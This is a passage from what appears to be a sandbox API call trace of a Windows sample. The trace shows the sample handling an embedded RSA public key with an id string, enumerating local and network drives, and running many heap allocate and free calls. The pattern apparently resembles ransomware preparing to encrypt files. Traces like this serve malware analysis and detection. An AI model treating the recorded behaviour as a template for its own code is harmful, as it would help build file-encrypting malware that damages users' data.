KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.861] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0177.862] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2c0000) returned 1 [0177.862] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.862] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0177.862] lstrcpyA (in: lpString1=0x8ccab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.862] lstrcpyA (in: lpString1=0x8cca778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.863] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74580 | out: hHeap=0x2c0000) returned 1 [0177.863] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0177.863] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0177.863] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0177.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73510 | out: hHeap=0x2c0000) returned 1 Thread: id = 162 os_tid = 0x5d8 [0178.369] timeGetTime () returned 0x9ac8 [0178.369] GetLastError () returned 0x54f [0178.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2a73510 [0178.369] GetCurrentThreadId () returned 0x5d8 [0178.369] SetLastError (dwErrCode=0x54f) [0178.369] Sleep (dwMilliseconds=0x0) [0178.372] Sleep (dwMilliseconds=0x3e8) [0179.428] GetLogicalDrives () returned 0x2000004 [0179.456] SetErrorMode (uMode=0x1) returned 0x0 [0179.456] PathFileExistsA (pszPath="C:\\") returned 1 [0179.457] SetErrorMode (uMode=0x0) returned 0x1 [0179.457] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0179.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2ade6e0 [0179.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f9fe60, cbMultiByte=-1, lpWideCharStr=0x2ade6e0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0179.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0179.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26768 [0179.551] SetErrorMode (uMode=0x1) returned 0x0 [0179.551] PathFileExistsA (pszPath="Z:\\") returned 1 [0179.552] SetErrorMode (uMode=0x0) returned 0x1 [0179.553] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0179.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2ade6e0 [0179.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f9fe60, cbMultiByte=-1, lpWideCharStr=0x2ade6e0, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0179.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4658 [0179.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424a0 [0179.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26768 | out: hHeap=0x2c0000) returned 1 [0179.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.565] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ade6e0 [0179.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 